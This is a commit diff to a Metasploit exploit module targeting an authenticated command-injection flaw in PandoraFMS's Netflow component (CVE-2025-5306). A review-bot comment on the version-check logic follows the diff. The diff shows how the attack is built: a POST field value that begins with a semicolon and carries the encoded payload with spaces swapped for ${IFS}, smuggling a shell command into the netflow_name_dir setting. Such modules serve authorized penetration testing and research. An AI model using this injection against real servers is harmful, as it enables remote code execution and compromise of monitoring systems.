
Commit af4cd2a

committed
Addresses comments, fixes check method
1 parent 37e8780 commit af4cd2a


1 file changed

+5
-9
lines changed


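--- a/modules/exploits/linux/http/pandora_fms_auth_netflow_rce.rb
+++ b/modules/exploits/linux/http/pandora_fms_auth_netflow_rce.rb
@@ -16,15 +16,12 @@ def initialize(info = {})
 info,
 'Name' => 'PandoraFMS Netflow Authenticated Remote Code Execution',
 'Description' => %q{
-This module exploits a command injection vulnerability in Netflow component of PandoraFMS. The module requires set of user credentials to modify Netflow settings. Also, Netflow binaries have to present on the system.
+This module exploits a command injection vulnerability in Netflow component of PandoraFMS. The module requires a set of user credentials to modify Netflow settings. Also, Netflow binaries have to present on the system.
 },
 'License' => MSF_LICENSE,
 'Author' => ['msutovsky-r7'], # researcher, module dev
 'References' => [
-[ 'OSVDB', '12345' ],
-[ 'EDB', '12345' ],
-[ 'URL', 'http://www.example.com'],
-[ 'CVE', '1978-1234']
+[ 'CVE', '2025-5306']
 ],
 'Platform' => ['unix', 'linux'],
 'Arch' => [ ARCH_CMD ],
@@ -88,9 +85,9 @@ def check
 
 vprint_status("Version #{version} detected")
 
-return Exploit::CheckCode::Vulnerable("Vulnerable PandoraFMS version #{version} detected") unless Rex::Version.new(version) < Rex::Version.new('7.0.777.10')
+return Exploit::CheckCode::Vulnerable("Vulnerable PandoraFMS version #{version} detected") if Rex::Version.new(version).between?(Rex::Version.new('7.0.774'), Rex::Version.new('7.0.777.10'))
 
-Msf::Exploit::CheckCode::Safe('Running version is not vulnerable')
+Msf::Exploit::CheckCode::Safe("Running version #{version}, which is not vulnerable")
 end
 
 def get_csrf_token
@@ -105,7 +102,6 @@ def get_csrf_token
 html = res.get_html_document
 
 fail_with Failure::UnexpectedReply, 'Empty response received' unless html
-html.at('div[@id="ver_num"]')&.text
 
 @csrf_token = html.at('input[@id="hidden-csrf_code"]')&.attributes&.fetch('value', nil)
 
@@ -158,7 +154,7 @@ def configure_netflow
 'vars_get' => { 'sec' => 'general', 'sec2' => 'godmode/setup/setup', 'section' => 'net' },
 'vars_post' =>
 {
-'netflow_name_dir' => ';' + payload.encoded.gsub(' ', '${IFS}') + '#;',
+'netflow_name_dir' => ';' + payload.encoded.gsub(' ', '${IFS}') + '#',
 'netflow_daemon' => netflow_daemon_value,
 'netflow_nfdump' => netflow_nfdump_value,
 'netflow_max_resolution' => netflow_max_resolution_value,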
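Review bot: In `check`, `between?` is inclusive at both ends, so a host reporting exactly 7.0.777.10 is returned as vulnerable; the page does not say whether 7.0.777.10 is the last affected or the first fixed release, and if it is the fixed one the upper bound should be exclusive, e.g. `v = Rex::Version.new(version)` followed by `... if v >= Rex::Version.new('7.0.774') && v < Rex::Version.new('7.0.777.10')`. The verdict rests on the version string alone, so `CheckCode::Appears` would describe the evidence more accurately than `CheckCode::Vulnerable` and keeps assessment reports from overstating a finding. The two returns also spell the constant differently (`Exploit::CheckCode` and `Msf::Exploit::CheckCode`); using one form throughout would read cleaner. The body of `check` starts above the hunk, so how `version` is extracted and whether it can be nil or malformed before reaching `Rex::Version.new` is not visible here.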
